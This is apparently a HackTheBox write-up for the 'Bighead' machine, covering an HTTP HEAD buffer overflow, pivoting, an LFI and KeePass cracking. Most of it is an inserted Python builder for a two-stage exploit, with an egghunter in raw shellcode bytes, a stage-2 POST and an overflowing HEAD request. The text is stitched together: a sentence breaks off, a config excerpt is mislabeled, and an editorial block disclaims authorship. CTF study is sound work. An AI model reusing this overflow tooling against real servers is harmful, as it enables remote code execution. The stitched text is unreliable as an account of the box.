Bighead was an extremely difficult box by 3mrgnc3 that starts with website enumeration to find two sub-domains and to determine that there is custom webserver software running behind an Nginx proxy. We then need to exploit a buffer overflow in HEAD requests by writing a custom exploit. After getting a shell, there's some pivoting involved to reach a limited SSH server, then an LFI to finally get a shell as SYSTEM. For the final stretch there is an NTFS alternate data stream holding a KeePass database that contains the final flag.

This box took the better part of my weekend when it came out, but unfortunately I didn't keep detailed notes about everything. It was especially hard going back while writing this up and remembering the 418 status code and the registry key for the SSH password. Note to self: always clean up my notes after doing a box.

The exploit part is especially tricky since there isn't a lot of buffer space to work with, so I had to put my second-stage payload in memory first with a POST request, then use an egghunter as the first-stage payload. There's also another way to exploit this software without using an egghunter: we can use the LoadLibrary function to remotely load a.

- Search GitHub and find that we can download the source code for the BigheadWebSvr webserver.
- Analyse the binary and determine that it is vulnerable to a buffer overflow in HEAD requests.
- Develop a working exploit locally on a 32-bit Windows 7 machine.
- Adapt the exploit so it works through the Nginx reverse proxy.
- Get a working reverse shell with the exploit and a Meterpreter payload.
- Find a local SSH service listening on port 2020, then set up port forwarding to reach it.
- Find the nginx SSH credentials by looking in the registry, then log in to bvshell.
- Find an LFI vulnerability in the Testlink application, then use it to get a shell as NT AUTHORITY\SYSTEM.
- Get the user.txt flag and find that root.txt is readable but contains a troll.
- Notice that KeePass is installed and that its configuration file names a keyfile and a database file called root.txt.
- Find that root.txt carries an NTFS alternate data stream containing the hidden KeePass database file.
- Download the admin.png keyfile, extract the hidden stream, extract the hash from the database file (keepass2john) and crack it with John the Ripper.
- Open the KeePass database with the keyfile and the cracked password, then recover the root.txt hash from the database.

There's a single port open and Nginx is listening on it:

    # Backend server to forward requests to/from
    proxy_cache_key $scheme$proxy_host$request_uri$request_method

So, both requests to / and /coffee are served by that crap custom webserver, but only /coffee reveals the Server header because of the proxy_pass_header Server directive in the config file. Nginx drops the upstream Server header by default (replacing it with its own), so the backend only identifies itself on the locations where that directive applies.

Exploit development (Method #1 using egghunter)

After opening the .exe file in IDA Free, I saw that the binary was compiled with MinGW.
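The two-stage layout described above (stage 2 parked in memory by a POST, an egghunter delivered in the overflowing HEAD request) as an added example, not the author's exploit and not code from the writeup. Everything specific is an assumption for illustration: that the overflow is in the request path, the offset, the return address, the egg tag, the host name, and the bad-character set (which must be re-measured through Nginx, since the proxy re-parses the request line before forwarding it). The egghunter bytes are skape's public 32-byte x86 Windows hunter, which matches the 32-bit Windows 7 target.

```python
import struct

# Constructed values for the demo; none of them come from the writeup.
EGG = b"w00t"            # 4-byte tag, written twice in front of stage 2
HOST = "target.example"  # hypothetical virtual host routed by the proxy
# Bytes that cannot appear in a request path because they end or
# re-interpret the request line before it reaches the backend:
PATH_BADCHARS = b"\x00\x0a\x0d\x20\x23\x3f"  # NUL LF CR SP '#' '?'


def egghunter(tag: bytes) -> bytes:
    """skape's NtAccessCheckAndAuditAlarm egghunter (x86 Windows, 32 bytes).

    Walks memory page by page, uses the syscall to test whether a page is
    readable, then looks for the tag twice in a row and jumps past it.
    """
    assert len(tag) == 4, "egg tag must be exactly 4 bytes"
    return (
        b"\x66\x81\xca\xff\x0f"  # or  dx, 0x0fff ; last byte of current page
        b"\x42"                  # inc edx        ; first byte of next page
        b"\x52"                  # push edx
        b"\x6a\x02"              # push 2         ; syscall number
        b"\x58"                  # pop eax
        b"\xcd\x2e"              # int 0x2e       ; NtAccessCheckAndAuditAlarm
        b"\x3c\x05"              # cmp al, 5      ; STATUS_ACCESS_VIOLATION?
        b"\x5a"                  # pop edx
        b"\x74\xef"              # je  +0  (or dx) ; unreadable: skip the page
        b"\xb8" + tag +          # mov eax, tag
        b"\x8b\xfa"              # mov edi, edx
        b"\xaf"                  # scasd          ; first copy of the tag?
        b"\x75\xea"              # jne +5 (inc edx); no: next address
        b"\xaf"                  # scasd          ; second copy?
        b"\x75\xe7"              # jne +5 (inc edx)
        b"\xff\xe7"              # jmp edi        ; edi now points at stage 2
    )


def find_badchars(payload: bytes, bad: bytes = PATH_BADCHARS) -> list:
    """Return (position, byte) pairs for every forbidden byte in payload."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]


def stage2_request(shellcode: bytes, tag: bytes = EGG, host: str = HOST) -> bytes:
    """POST that plants tag*2 + shellcode in the server process's memory.

    The body is never executed by this request; it only has to stay resident
    somewhere the hunter can reach. Whether it survives until the HEAD
    request arrives depends on how the server buffers requests (assumed).
    """
    body = tag * 2 + shellcode
    return (
        b"POST /stage HTTP/1.1\r\n"  # path is arbitrary (assumed)
        b"Host: " + host.encode() + b"\r\n"
        b"Content-Length: " + str(len(body)).encode() + b"\r\n\r\n"
        + body
    )


def stage1_payload(offset: int, ret: int, tag: bytes = EGG) -> bytes:
    """Overflow data: padding up to the saved return address, the address of
    an instruction that redirects execution into the buffer (assumed; a
    "jmp esp"-style gadget in a real exploit), a short NOP sled, the hunter."""
    return b"A" * offset + struct.pack("<I", ret) + b"\x90" * 8 + egghunter(tag)


def stage1_request(offset: int, ret: int, tag: bytes = EGG, host: str = HOST) -> bytes:
    """HEAD request whose path (assumed injection point) carries the overflow.
    Refuses to build a request that the proxy would truncate or reject."""
    payload = stage1_payload(offset, ret, tag)
    bad = find_badchars(payload)
    if bad:
        raise ValueError(f"payload contains request-line bad chars: {bad}")
    return (b"HEAD /" + payload + b" HTTP/1.1\r\n"
            b"Host: " + host.encode() + b"\r\n\r\n")


if __name__ == "__main__":
    # Placeholder stage 2 (int3 markers, not real shellcode) and a placeholder
    # return address; both would come from debugging the actual binary.
    print(stage2_request(b"\xcc" * 16)[:64])
    print(stage1_request(offset=64, ret=0x41424344)[:64])
```

The bad-character check is the part worth keeping: a return address such as 0x00401000 contains a NUL and is rejected here, and any byte the proxy strips or splits on (space, '#', '?') would silently cut the hunter short, which is the kind of failure that only shows up once the exploit is sent through Nginx rather than directly at the local copy of the server.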